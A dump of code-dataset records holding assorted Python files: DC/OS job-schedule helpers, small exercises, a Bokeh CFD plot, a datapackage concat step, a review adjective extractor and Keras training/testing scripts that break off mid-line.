json for creation or update\n :type job_json: dict\n :returns: the json representation ready for put and post job operations\n :rtype: dict\n '''\n clean_job_json = copy.deepcopy(job_json)\n for key in clean_job_json:\n if key not in constants.JOB_JSON_DEF_ALLOWED_KEYS:\n del job_json[key]\n if key in [\"schedules\"] and remove_schedules_key:\n del job_json[key]\n\n schedules = job_json.get('schedules')\n if isinstance(schedules, list) and schedules:\n for index, value in enumerate(clean_job_json['schedules']):\n for key in value:\n if key not in constants.SCHEDULE_JSON_DEF_ALLOWED_KEYS:\n del job_json['schedules'][index][key]\n else:\n logger.debug(\"No schedules, nothing else to clean up \")\n\n return job_json\n\n\ndef add_schedules(job_id, schedules_json, client):\n \"\"\"\n :param job_id: Id of the job\n :type job_id: str\n :param schedules_json: json for the schedules\n :type schedules_json: json\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n :rtype: int\n \"\"\"\n\n if schedules_json is None:\n raise DCOSException('Schedule JSON is required.')\n\n if type(schedules_json) is list:\n for schedule in schedules_json:\n client.add_schedule(job_id, schedule)\n else:\n client.add_schedule(job_id, schedules_json)\n\n emitter.publish('Successfully added schedule(s)')\n\n return 0\n\n\ndef update_schedules(job_id, original_job_schedules, new_job_schedules,\n client):\n \"\"\"\n Updates a Job schedules, merging schedules that persist, removing the ones\n not in the new list, creating the new ones\n :param job_id: Id of the job\n :type job_id: str\n :param original_job_schedules: original job json schedules\n :type original_job_schedules: [dict]\n :param new_job_schedules: new job json schedules\n :type new_job_schedules: [dict]\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n :rtype: int\n \"\"\"\n\n if not isinstance(original_job_schedules, list) or not isinstance(\n new_job_schedules, list):\n raise DCOSException('Original or new schedules need to be lists.')\n\n if not new_job_schedules:\n # If new has no schedules, remove all schedules in old\n return remove_schedules(job_id, original_job_schedules, client)\n\n # Remove all keys in old not in new, and update those that are\n new_schedules_ids_list = [s.get('id') for s in new_job_schedules]\n for schedule in original_job_schedules:\n schedule_id = schedule['id']\n if schedule_id not in new_schedules_ids_list:\n _remove_schedule(job_id, schedule_id, client)\n logger.debug(\"Removed schedule '{}' from job '{}'\".format(\n schedule_id, job_id))\n else:\n try:\n # nsi is the new schedule index to get the new schedule\n # whose id is schedule_id\n nsi = common.get_index_dict_by_key_value(\n new_job_schedules, 'id', schedule_id)\n _update_schedule(job_id, new_job_schedules[nsi], client)\n logger.debug(\"Updated schedule '{}' for job '{}'\".format(\n schedule_id, job_id))\n except DCOSHTTPException as e:\n if e.response.status_code == 404:\n emitter.publish(\n \"Job '{}' and/or schedule '{}' does/do NOT exist.\"\n .format(job_id, schedule_id))\n except DCOSException as e:\n raise DCOSException(e)\n\n # Add the new not in the old\n original_schedules_ids_list = [s.get('id') for s in original_job_schedules]\n for schedule in new_job_schedules:\n schedule_id = schedule['id']\n if schedule_id not in original_schedules_ids_list:\n client.add_schedule(job_id, schedule)\n\n return 0\n\n\ndef _update_schedule(job_id, schedule_json, client):\n \"\"\"\n Updates the schedule whose id matches that of schedule_json\n with the schedule_json\n :param job_id: Id of the job\n :type job_id: str\n :param schedules_json: json for the schedules\n :type schedules_json: dict\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n :rtype: int\n \"\"\"\n\n if schedule_json is None:\n raise DCOSException(\"No schedule to update.\")\n\n schedule_id = schedule_json.get('id')\n try:\n client.update_schedule(job_id, schedule_id, schedule_json)\n logger.info(\"Schedule ID `{}` for job ID `{}` updated.\".format(\n schedule_id, job_id))\n except DCOSHTTPException as e:\n if e.response.status_code == 404:\n emitter.publish(\n \"Job ID: '{}' or schedule ID '{}' does NOT exist.\".format(\n job_id, schedule_id))\n except DCOSException as e:\n raise DCOSException(e)\n\n return 0\n\n\ndef remove_schedules(job_id, schedules_json, client):\n \"\"\"\n Removes all of the schedules listed on the schedules_json\n :param job_id: Id of the job\n :type job_id: str\n :param schedules_json: json for the schedules\n :type schedules_json: dict | [dict]\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n :rtype: int\n \"\"\"\n\n if schedules_json is None:\n raise DCOSException('Schedule JSON is required.')\n\n if type(schedules_json) is list:\n for schedule in schedules_json:\n schedule_id = schedule.get('ID')\n _remove_schedule(job_id, schedule_id, client)\n else:\n _remove_schedule(job_id, schedule_id, client)\n\n logger.info('Successfully removed all schedules for Job {}'.format(job_id))\n\n return 0\n\n\ndef _remove_schedule(job_id, schedule_id, client):\n \"\"\"\n :param job_id: Id of the job\n :type job_id: str\n :param schedule_id: Id of the schedule\n :type schedule_id: str\n :returns: process return code\n :rtype: int\n \"\"\"\n if schedule_id is None:\n raise DCOSException('Schedule ID is required.')\n\n try:\n client.remove_schedule(job_id, schedule_id)\n except DCOSHTTPException as e:\n if e.response.status_code == 404:\n raise DCOSException(\"Schedule or job ID does NOT exist.\")\n except DCOSException as e:\n raise DCOSException(\n \"Unable to remove schedule ID '{}' for job ID '{}'\".format(\n schedule_id, job_id))\n\n return 0\n","sub_path":"quarrier/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"402172080","text":"def i_tri(s):\n total = 140.6\n rest = \"{0:.2f}\".format(total-s)\n\n if s <= 0:\n return 'Starting Line... Good Luck!'\n\n if (s > 0 and s <= 2.4):\n return {'Swim': rest+' to go!'}\n\n if (s > 2.4 and s <= 114.4):\n return {'Bike': rest+' to go!'}\n\n if (s > 114.4 and s < 130.6):\n return {'Run': \"'\"+rest+\" to go!\"}\n\n if (s > 130.6 and s < 140.6):\n return {'Run': 'Nearly there!'}\n\n if (s >= 140.6):\n return \"You're done! Stop running!\"\n","sub_path":"Python/Ironman Triathlon.py","file_name":"Ironman Triathlon.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"499349107","text":"picture = makePicture(pickAFile())\ndef colourRectangleD(picture):\n width=getWidth(picture)\n height=getHeight(picture)\n y=0\n while (y < height/2):\n x=0\n while (x < width/2):\n px=getPixel(picture,x,y)\n setColor(px,red)\n x=x+1\n y=y+1 ","sub_path":"Week 05 - Modifying pictures using loops (contd.)/colourRectangleD.py","file_name":"colourRectangleD.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"254669232","text":"#!/usr/bin/env python\n\nfrom __future__ import division\nimport numpy as np\nimport pandas as pd\nimport bokeh.plotting as bplt \nfrom bokeh.models import ColumnDataSource, HBox, VBoxForm, BoxSelectTool,HoverTool\nfrom bokeh.models.widgets import Slider,TextInput\nfrom bokeh.io import curdoc, show, vform\n\n\ndef lineardiv(nx,c=1,sigma=0.5,tmax=1,xmax=3,):\n \n nt=int((tmax/xmax)*((nx-1)/(c*sigma))+1) # Time Grid\n \n x,dx=np.linspace(0,xmax,nx,retstep=True)\n t,dt=np.linspace(0,tmax,nt,retstep=True)\n \n # Initial conditions\n #\n # u=2 if 0.5 <= x <= 1\n # u=1 everywhere else in the support\n #u = np.ones_like(x)\n #u[np.where((.5<=x) & (x<=1))]=2\n U = np.ones((nt,nx))\n U[0][np.where((.5<=x) & (x<=1))]=2\n \n # Calculate the wave over the time\n for n in range(1,nt):\n for i in range(1,nx):\n U[n][i]= U[n-1][i] - U[n-1][i]*dt/dx* ( U[n-1][i]-U[n-1][i-1] )\n\n return U,x,t,dx,dt,nt\n\ndef plotcfg(height=600,width=800):\n plot = bplt.figure(plot_height=height, plot_width=width, \n title=\"Wave sliding\",\n tools=\"pan,resize,box_zoom,wheel_zoom,hover,reset,save,crosshair\",\n y_axis_label=\"Amplitude\",\n x_axis_label=\"Distance\")\n\n return plot\n\ndef drawgraph(plot,x,y):\n # Need to clean the image first\n plot.line(x,U[0],line_width=3, line_alpha=0.2, line_color=\"black\",line_dash=[6,3], legend=\"I.C\")\n plot.line(x,U[-1],line_width=3, line_alpha=0.6,legend=\"After\")\n plot.circle(x,U[-1],size=5)\n\n\nif __name__ == \"__main__\":\n U,x,t,dx,dt,nt=lineardiv(101)\n plot=plotcfg()\n drawgraph(plot,x,U[-1])\n\n slider = Slider(start=0, end=10, value=1, step=.1, title=\"Stuff\")\n\n bplt.output_file(\"slid.html\")\n layout = vform(slider,plot)\n show(layout)\n","sub_path":"python/CFD/slid.py","file_name":"slid.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"279283769","text":"lst = [1, 2, 3, 4, 5]\n\nlst_2_1 = [] # для цикла с while\nlst_2_2 = [] # для цикла с for\n\nfirst_item = lst.pop(0)\nlength = len(lst)\ntemporary = 0\n\nwhile length > 0:\n item = lst[temporary]\n lst_2_1.append(item)\n temporary += 1\n length -= 1\nelse:\n lst_2_1.append(first_item)\nprint(lst_2_1)\n\nfor i in lst:\n lst_2_2.append(i)\nelse:\n lst_2_2.append(first_item)\nprint(lst_2_2)\n","sub_path":"task_4_4.py","file_name":"task_4_4.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"93327774","text":"import logging\n\nfrom datapackage_pipelines.wrapper import ingest, spew\n\nparams, datapackage, res_iter = ingest()\n\ncolumn_aliases = params['column-aliases']\ncolumn_mapping = {}\nfor target, sources in column_aliases.items():\n if sources is not None:\n for source in sources:\n if source in column_mapping:\n raise RuntimeError('Duplicate appearance of %s' % source)\n column_mapping[source] = target\n if target in column_mapping:\n raise RuntimeError('Duplicate appearance of %s' % target)\n column_mapping[target] = target\n\nresource_name = params.get('resource-name', 'concat')\nconcat_resource = {\n 'name': resource_name,\n 'path': 'data/'+resource_name+'.csv',\n 'mediatype': 'text/csv',\n 'schema': {\n 'fields': [],\n 'primaryKey': []\n },\n}\n\nused_fields = set()\nfor resource in datapackage['resources']:\n schema = resource.get('schema', {})\n pk = schema.get('primaryKey', [])\n for field in schema.get('fields', []):\n orig_name = field['name']\n if orig_name in column_mapping:\n name = column_mapping[orig_name]\n if name in used_fields:\n continue\n if orig_name in pk:\n concat_resource['schema']['primaryKey'].append(name)\n concat_resource['schema']['fields'].append(field)\n field['name'] = name\n used_fields.add(name)\n\ndatapackage['resources'] = [concat_resource]\n\n\ndef process_resources(_res_iter):\n for rows_iter in _res_iter:\n for row in rows_iter:\n processed = dict((k, '') for k in used_fields)\n values = [(column_mapping[k], v) for (k, v)\n in row.items()\n if k in column_mapping]\n assert len(values) > 0\n processed.update(dict(values))\n yield processed\n\nspew(datapackage, [process_resources(res_iter)])\n","sub_path":"datapackage_pipelines/lib/concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"348404953","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name = 'eoepca-uma',\n version = '0.2.4',\n author = 'EOEPCA',\n author_email = 'angel.lozano@deimos-space.com',\n description = 'Python library to interact with UMA protocol',\n long_description = long_description,\n long_description_content_type=\"text/markdown\",\n url = 'https://github.com/EOEPCA/um-common-uma-client ',\n packages=setuptools.find_packages(),\n license='apache-2.0',\n keywords = ['UMA', 'Client', 'EOEPCA','user','management'],\n classifiers=[\n 'Development Status :: 3 - Alpha', # Chose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n ],\n python_requires='>=3.6',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"308786278","text":"import pandas as pd\nimport numpy as np\nimport gzip\nimport os\nimport json\nimport matplotlib \nimport matplotlib.pyplot as plt\n\nimport nltk\nfrom nltk.corpus import stopwords\nimport string\n\nimport textblob\nfrom textblob import TextBlob\n\n\ndata_dir = os.path.join('/Users/jiristodulka/GoogleDrive/GitHub/product_filter','data')\n\n\nclass DataLoad:\n '''\n Desc.\n ''' \n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n def load_meta(self):\n '''\n Desc.: \n - loads metadata that sore info about 'Movies & TV' ONLY\n Input:\n - By Default it takes the data from ./data directory\n Returns:\n - meta_df : pd.DataFrame object with info about items\n \n '''\n meta = []\n with gzip.open(self.data_dir +'/meta_Movies_and_TV.json.gz') as f:\n for l in f:\n meta.append(json.loads(l.strip()))\n \n self.meta_df = pd.DataFrame(meta)[['main_cat', 'title','asin']]\n self.reviews_df =self. meta_df[self.meta_df['main_cat']== 'Movies & TV']\n return self.meta_df\n\n\n def load_reviews(self):\n '''\n Desc.:\n - Load Reviews\n Input:\n - By Default it takes the data from ./data directory\n Returns:\n reviews_df: pd.DataFrame object storing ALL the reviews for MULTIPLE CATEGORIES\n \n '''\n reviews = []\n for line in open(self.data_dir + '/Movies_and_TV_5.json', 'r'):\n reviews.append(json.loads(line))\n \n self.reviews_df = pd.DataFrame(reviews)\n return self.reviews_df\n\n def merge_reviews_meta(self):\n '''\n \n '''\n self.merged_df = pd.merge(self.reviews_df, self.meta_df[['title', 'asin']],\n how = 'inner', left_on='asin', right_on = 'asin')\n self.merged_df['char_count'] = self.merged_df['reviewText'].str.len()\n return self.merged_df\n\n\ndef downsample_reviews(merged_df, rating_min = 10 ,length = [300,800]):\n '''\n Desc.: \n - Subsets the merged_df input to extract only relevant records (\"Movies and TV\"):\n 1. selects only movies category\n 2. N/A\n 3. length of reviews in certain range\n 4. only certain # of reviews\n Input:\n - merged_df: output of merge_reviews_meta(reviews_df, meta_df)\n - length: min and max length of reviews in range\n - trashold: max number of reviews per movie\n \n Returns:\n downsampled reviews pd.DataFrame\n '''\n down_reviews_df = merged_df.copy()\n \n down_reviews_df['char_count'] = down_reviews_df['reviewText'].str.len()\n down_reviews_df['sum_reviews'] = down_reviews_df.groupby('title')['title'].transform('count')\n\n sample = down_reviews_df[down_reviews_df['char_count'].between(length[0], length[1])]\n sample = sample[sample['sum_reviews'] >= rating_min]\n \n titles_index = sample.title.value_counts()[sample.title.value_counts()>=rating_min].index \n sample = sample[sample['title'].isin(titles_index)]\n \n sample_df = sample.groupby('title').apply(lambda x: x.sample(rating_min)).reset_index(drop = True)\n\n return sample_df\n\n\ndef clean_reviews(sample_df):\n '''\n Desc.:\n Clean 'reviewText', extracts adjectives for each review into a list in new column: review_adjectives\n Input:\n - sample_df: pd.DataFrame as sampled reviews\n Output:\n - ...: identical to the input but with new columns storing the adjectives in review's in the a list\n \n '''\n clean_sample = sample_df.copy()\n clean_sample['reviewText']=clean_sample.reviewText.str.lower()\n clean_sample['reviewText'] = clean_sample['reviewText'].str.replace('[^A-z ]','').str.replace(' +',' ').str.strip()\n \n def get_adjectives(text):\n blob = TextBlob(text)\n '''\n Extracts adjectives\n '''\n return [ word for (word,tag) in blob.tags if tag == \"JJ\"]\n \n clean_sample_df = clean_sample.copy()\n clean_sample['review_adjectives'] = clean_sample['reviewText'].apply(get_adjectives)\n clean_sample_df = clean_sample.copy()\n return clean_sample_df\n\n\n\n\ndef main():\n dataload = DataLoad(data_dir)\n\n meta_df = dataload.load_meta()\n reviews_df = dataload.load_reviews()\n merged_df = dataload.merge_reviews_meta()\n\n sample_df = downsample_reviews(merged_df)\n clean_sample_df = clean_reviews(sample_df)\n return clean_sample_df\n\nif __name__ == \"__main__\":\n clean_sample_df = main()\n clean_sample_df.to_csv('sampled_reviews.csv', index = False)","sub_path":"reviews_ratings_engineering/generate_reviews_adjectives.py","file_name":"generate_reviews_adjectives.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"50868081","text":"from math import sqrt as s\r\nfrom collections import Counter as c\r\nn=int(input())\r\nli=[]\r\nwhile n%2 == 0:\r\n li.append(2)\r\n n//=2\r\nfor i in range(3,int(s(n))+1,2):\r\n while n%i == 0:\r\n li.append(i)\r\n n//=i\r\nif n>2:\r\n li.append(n)\r\nfor i,j in dict(c(li)).items():\r\n print(i,j)\r\n","sub_path":"power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585719293","text":"'''\ntrain.py = used for training a model\n'''\nimport os\nimport sys\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndir_path = dir_path[:dir_path.find('/phd')+4]\nif not dir_path in sys.path:\n sys.path.append(dir_path)\n print(sys.path)\n\nimport utilities.paths as paths\nDRIVE = paths.get_drive()\n\nfrom keras_code import predict, models\n\nimport datetime\n\nfrom keras import backend as K\nfrom sklearn.metrics import average_precision_score, classification_report, confusion_matrix\n\nfrom plotting.plot_pr_curve import plot_pr_curve\nfrom plotting.plot_confusion_matrix import plot_confusion_matrix\n\nimport utilities.paths as paths\nDRIVE = paths.get_drive()\nfrom keras_code import models\nfrom keras.models import Model\n\nimport numpy as np\nimport time\nimport os\nimport argparse\nimport math\nfrom utilities.logging import print_n_log, refresh_log\nimport utilities.paths as paths\nDRIVE = paths.get_drive()\n\n\ndef predict(model, split, batch_size=16, load_epoch=None, force_noneq=False, layers=['pred'], save_path=None, dataset=None):\n\n prediction_start_time = time.clock()\n\n # Load log\n assert (model is not None), \"model is None\"\n\n # get data\n if dataset is None:\n dataset = models.get_dataset(model_id, split, force_noneq=force_noneq, batch_size=batch_size)\n\n for layer_name in layers:\n if model.get_layer(layer_name) is None:\n model = Model(inputs=model.input, outputs=model.get_layer('predictions').output)\n else:\n model = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)\n\n # BATCH LOOP\n past = 0\n num_of_samples = dataset.number_of_samples()\n num_of_batches = int(math.floor(num_of_samples/float(batch_size)))\n sample_count = 0\n sum_loss = 0\n sum_count = 0\n c = 0\n Y = None\n P = None\n S = None\n for batch_count in range(0, num_of_batches):\n c += 1\n\n x, y, sid = dataset.get_batch_xy(True)\n\n sample_count += len(y)\n\n p = model.predict_on_batch(x)\n\n if Y is None:\n Y = y\n P = p\n S = sid\n else:\n Y = np.append(Y, y, axis=0)\n P = np.append(P, p, axis=0)\n S = np.append(S, sid, axis=0)\n\n if (int((float(batch_count) / num_of_batches) * 100) > past) or (batch_count == num_of_batches-1):\n\n etr = (num_of_samples - sample_count) * ((time.clock() - prediction_start_time) / float(sample_count))\n\n print(\"\\n%d .. Batch: %d / %d; Image: %d / %d; Total TR: %02d:%02d:%02d;\" % (\n past, batch_count, num_of_batches, sample_count, num_of_samples, int((etr / 60) / 60), int((etr / 60) % 60),\n int(etr % 60)))\n past += 10\n\n\n return Y, P, S\n\n\ndef test(model_id, identifier, model_path, split='test', batch_size=16, load_epoch=None, save_path=None, model=None, force_noneq=True):\n\n # set the channel order correctly\n if K.backend() == 'theano':\n K.set_image_dim_ordering('th')\n K.set_image_data_format('channels_first')\n else:\n K.set_image_dim_ordering('tf')\n K.set_image_data_format('channels_last')\n\n model_path = model_path\n\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n\n\n if force_noneq:\n ne = '-NE'\n else:\n ne = ''\n\n log = open(model_path + '/log_testing_' + split + '-e' + str(load_epoch) + ne + '.txt', \"a\")\n print_n_log(log, '\\n\\n\\nTesting initialised: {:%Y-%m-%d %H:%M:%S}\\n\\n'.format(datetime.datetime.now()))\n\n dataset = models.get_dataset(model_id, split, force_noneq=force_noneq, batch_size=batch_size)\n dataset.get_dataset_statistics(log)\n\n if os.path.exists(model_path + '/testing_stats-e' + str(load_epoch) + ne + '.npy'):\n [Y, P, S, labels] = np.load(\n model_path + '/testing_stats-e' + str(load_epoch) + ne + '.npy') # S might not be in some old files\n else:\n if model_id in ['MVK_50_04', 'MVK_50_05']:\n Y, P, S = predict(model, split, batch_size, load_epoch, force_noneq,\n ['pool_pred'], save_path) # TODO fix hardcode\n else:\n Y, P, S = predict(model, split, batch_size, load_epoch, force_noneq,\n ['pred'], save_path)\n\n labels = dataset.get_labels()\n\n np.save(model_path + '/testing_stats-e' + str(load_epoch) + ne + '.npy', [Y, P, S, labels])\n\n num_classes = len(labels)\n assert (np.shape(Y)[1] == np.shape(P)[1] == num_classes), \"Number of classes don't match\"\n\n # Build empty array for TP, FP, TN, FN counts for each class\n results = np.zeros((num_classes, 4), dtype=np.float32)\n\n # COUNT TP, FP, TN, FN\n for s in range(len(Y)):\n p = np.argmax(P[s])\n y = np.argmax(Y[s])\n\n if p == y: # TP\n for c in range(num_classes):\n if c == y: # add to TP count\n results[c][0] += 1\n else: # add to TN count for rest\n results[c][2] += 1\n else:\n for c in range(num_classes):\n if c == p: # add to FP count\n results[c][1] += 1\n elif c == y: # add to FN count\n results[c][3] += 1\n else: # add to TN count for rest\n results[c][2] += 1\n\n # Calculate overlap\n print_n_log(log, '\\n-=-=-=-=\\nOverlap\\n')\n mult = np.zeros((len(Y),num_classes))\n for s in range(len(Y)):\n for c in range(num_classes):\n if Y[s][c] > 0:\n mult[s][c] = min(P[s][c]/Y[s][c], 1)\n over = 0\n false_over = 0\n for c in range(num_classes):\n col = mult[:, c]\n over += np.average(col[col > 0])\n print_n_log(log, labels[c] + ' \\t ' + str(np.average(col[col > 0]))+'\\n')\n print_n_log(log, 'Avg: ' + str(over/len(labels))+'\\n')\n\n print_n_log(log, '\\nWrong Overlap\\n')\n mult = np.multiply(np.abs(Y-1), P)\n mult = np.zeros((len(Y),len(labels)))\n for s in range(len(Y)):\n for c in range(len(labels)):\n if Y[s][c] == 0:\n mult[s][c] = P[s][c]\n for c in range(len(labels)):\n col = mult[:, c]\n false_over += np.average(col[col > 0])\n print_n_log(log, labels[c] + ' \\t ' + str(np.average(col[col > 0]))+'\\n')\n\n print_n_log(log, 'Avg: ' + str(false_over/len(labels))+'\\n')\n\n # Display\n width = max(len(cn) for cn in labels)\n headers = [\"TP\", \"FP\", \"TN\", \"FN\", \"precision\", \"recall\", \"TNR\", \"Accuracy\"]\n fmt = '%% %ds' % width # first column: class name\n fmt += ' '\n fmt += ' '.join(['% 9s' for _ in headers])\n fmt += '\\n'\n\n headers = [\"\"] + headers\n report = fmt % tuple(headers)\n report += '\\n'\n\n TPA = 0\n FPA = 0\n TNA = 0\n FNA = 0\n for c in range(len(labels)):\n TP = results[c][0]\n FP = results[c][1]\n TN = results[c][2]\n FN = results[c][3]\n TPA += TP\n FPA += FP\n TNA += TN\n FNA += FN\n\n values = [labels[c].rstrip()]\n vc = 0\n for v in (TP, FP, TN, FN, TP/float(TP+FP), TP/float(TP+FN), TN/float(TN+FP), (TP+TN)/float(TP+FP+TN+FN)):\n vc+=1\n if vc<5:\n values += [str(v)]\n else:\n values += [\"{0:0.{1}f}\".format(v, 4)]\n report += fmt % tuple(values)\n report += '\\n'\n\n print_n_log(log, report)\n\n\n Y_labs = np.argmax(Y, axis=1)\n P_labs = np.argmax(P, axis=1)\n\n print_n_log(log, classification_report(Y_labs, P_labs, target_names=labels, digits=4))\n\n # # Calculate APs for classes\n # APs = [[]] * num_classes\n # for c in range(num_classes):\n # # Add samples to class\n # samples = []\n # for s in range(len(Y)):\n # if np.argmax(P[s]) == c:\n # samples.append([P[s],np.argmax(Y[s])])\n #\n # # Rank the predictions based on confidence\n # samples.sort(key=lambda x: x[0][c], reverse=True)\n #\n # # Do the AP calculation per class\n # TP = 0\n # FP = 0\n # num = 0\n # for s in samples:\n # if np.argmax(s[0]) == s[1]:\n # TP += 1\n # num += (TP/float(TP+FP))\n # else:\n # FP += 1\n #\n # if TP == 0:\n # APs[c] = 0\n # else:\n # APs[c] = num/TP\n #\n # print_n_log(log, '\\nAverage Precsions per Class\\n')\n # for c in range(len(labels)):\n # print_n_log(log, \"\\t%s\\t%.4f\\n\" % (labels[c].rstrip(), APs[c]))\n # # Calculate mAP\n # mAP = sum(APs)/float(num_classes)\n # print_n_log(log, \"\\t%s\\t%.4f\\n\" % ('mAP', mAP))\n\n # Plot PR curve\n plot_pr_curve(Y, P, labels, save=model_path + '/prc_'+split+'-e'+str(load_epoch)+'.pdf')\n\n # Calculate APs\n APs = [[]] * num_classes\n for c in range(num_classes):\n APs[c] = average_precision_score(Y[:, c], P[:, c])\n\n print_n_log(log, '\\nAverage Precsions per Class\\n')\n for c in range(len(labels)):\n print_n_log(log, \"\\t%s\\t%.4f\\n\" % (labels[c].rstrip(), APs[c]))\n\n # Calculate mAP\n mAP = sum(APs)/float(num_classes)\n print_n_log(log, \"\\t%s\\t%.4f\\n\" % ('mAP', mAP))\n\n # print_n_log(log, \"\\t%s\\t%.4f\\n\" % ('mAP2', average_precision_score(Y, P))) # Same as above\n\n\n cm = plot_confusion_matrix(confusion_matrix(Y_labs,P_labs), classes=labels,\n title='Confusion matrix, without normalization', save=model_path + '/confmat_'+split+'-e'+str(load_epoch)+'.pdf')\n print_n_log(log, 'Confusion matrix, without normalization\\n')\n print_n_log(log, str(cm)+'\\n\\n')\n\n # cm = plot_confusion_matrix(confusion_matrix(Y_labs,P_labs), classes=labels, normalize=True,\n # title='Normalized confusion matrix')\n # print_n_log(log, 'Normalized confusion matrix')\n # print_n_log(log, str(cm)+'\\n\\n')\n\n log.close()\n\n\ndef train(model_id, identifier, model_path, nb_epoch=20, batch_size=16, load_epoch=None):\n\n # set the channel order correctly\n if K.backend() == 'theano':\n K.set_image_dim_ordering('th')\n K.set_image_data_format('channels_first')\n else:\n K.set_image_dim_ordering('tf')\n K.set_image_data_format('channels_last')\n\n training_start_time = time.clock()\n t_l = [[], []]\n v_l = [[], []]\n v_a = [[], []]\n\n model_path = model_path + model_id + '_' + identifier\n # Load log\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n log = open(model_path + '/log.txt', \"a\")\n print_n_log(log, '\\n\\n\\nTraining initialised: {:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n\n # Check load epoch, if not specified or less than 0 get latest\n if (load_epoch is None) or (load_epoch < 0):\n load_epoch = 0\n for i in range(100,-1,-1):\n if os.path.isfile(model_path + '/' + model_id + '_' + identifier + '-e' + str(i) + '.h5'):\n load_epoch = i\n break\n\n if load_epoch == 0:\n print_n_log(log, '\\nTraining model from scratch...\\n\\n')\n model, output_classes = models.get_model_from_id(model_id, identifier, batch_size)\n else:\n print_n_log(log, '\\nLoading past model to train from:\\n')\n print_n_log(log, '\\n' + model_path + '/' + model_id + '_' + identifier + '-e' + str(load_epoch) + '.h5\\n\\n')\n [t_l, v_l, v_a] = np.load(model_path + '/training_stats-e'+str(load_epoch)+'.npy')\n model, output_classes = models.get_model_from_id(model_id, identifier, batch_size, load_epoch=load_epoch)\n\n assert (model is not None), \"model is None\"\n\n # Compile the model\n model = models.compile_model(model_id, model)\n\n # Load the dataset (train and val)\n dataset = models.get_dataset(model_id, 'train', force_noneq=False, batch_size=batch_size)\n dataset_val = models.get_dataset(model_id, 'val', force_noneq=False, batch_size=batch_size)\n\n class_weights = dataset.get_class_weights(type='balanced')\n\n dataset.get_dataset_statistics(log)\n dataset_val.get_dataset_statistics(log)\n # dataset.set_batch_size(batch_size)\n\n fig = None\n for e in range(load_epoch + 1, nb_epoch + 1):\n # refresh log every epoch\n log = refresh_log(log, model_path)\n print_n_log(log, \"\\n\\n--------------------------------------------\\nepoch %d\\n--------------------------------------------\\n\" % e)\n\n # Reset and Randomise the dataset per epoch\n dataset.reset()\n dataset.randomise()\n\n\n past = 0\n epoch_start_time = time.clock()\n\n # BATCH LOOP\n num_of_samples = dataset.number_of_samples()\n num_of_batches = int(math.floor(num_of_samples/float(batch_size)))\n sample_count = 0\n sum_loss = 0\n sum_count = 0\n c = 0\n for batch_count in range(0, num_of_batches):\n c += 1\n # Get data per batch\n x, y, sid = dataset.get_batch_xy(True)\n sample_count += len(y)\n # print(c)\n\n loss, acc = model.train_on_batch(x, y, class_weight=class_weights)\n\n # Sums since last print\n sum_loss += loss\n sum_count += 1\n\n if (int((float(batch_count) / num_of_batches) * 100) > past) or (batch_count == num_of_batches-1):\n\n etr = (num_of_samples - sample_count) * ((time.clock() - epoch_start_time) / float(sample_count))\n ttr = ((nb_epoch - e + 1) * num_of_samples - sample_count) / (((e-1) * num_of_samples + sample_count) / (time.clock() - training_start_time))\n\n\n log = refresh_log(log, model_path)\n print_n_log(log, \"\\n%d .. [loss: %.5f] Batch: %d / %d; Image: %d / %d; Epoch TR: %02d:%02d:%02d; Total TR: %02d:%02d:%02d;\" % (\n past, sum_loss / sum_count, batch_count, num_of_batches, sample_count, num_of_samples, int((etr / 60) / 60), int((etr / 60) % 60),\n int(etr % 60),\n int((ttr / 60) / 60), int((ttr / 60) % 60), int(ttr % 60)))\n\n t_l[0].append((e - 1) + past * .01)\n t_l[1].append(sum_loss / sum_count)\n\n # graph it\n # if not paths.is_cluster():\n # if fig:\n # plt.close()\n # fig, ax1 = plt.subplots()\n # ax1.plot(t_l[0], t_l[1], 'g-')\n # ax1.plot(v_l[0], v_l[1], 'b-')\n # ax1.set_ylim(bottom=0)\n # ax2 = ax1.twinx()\n # ax2.plot(v_a[0], v_a[1], 'r-')\n # ax2.set_ylim(top=1)\n\n past += 10\n sum_loss = 0\n sum_count = 0\n\n # if past > 0:\n # break\n\n # Validation\n print_n_log(log, '\\n------------------------ Validation results ------------------------\\n\\n')\n\n # reset and randomise validation dataset\n dataset_val.reset()\n dataset_val.randomise()\n\n past = 0\n val_metrics = []\n # soft = pickl---------------------------------------------------------------------------------e.load(open(DRIVE + 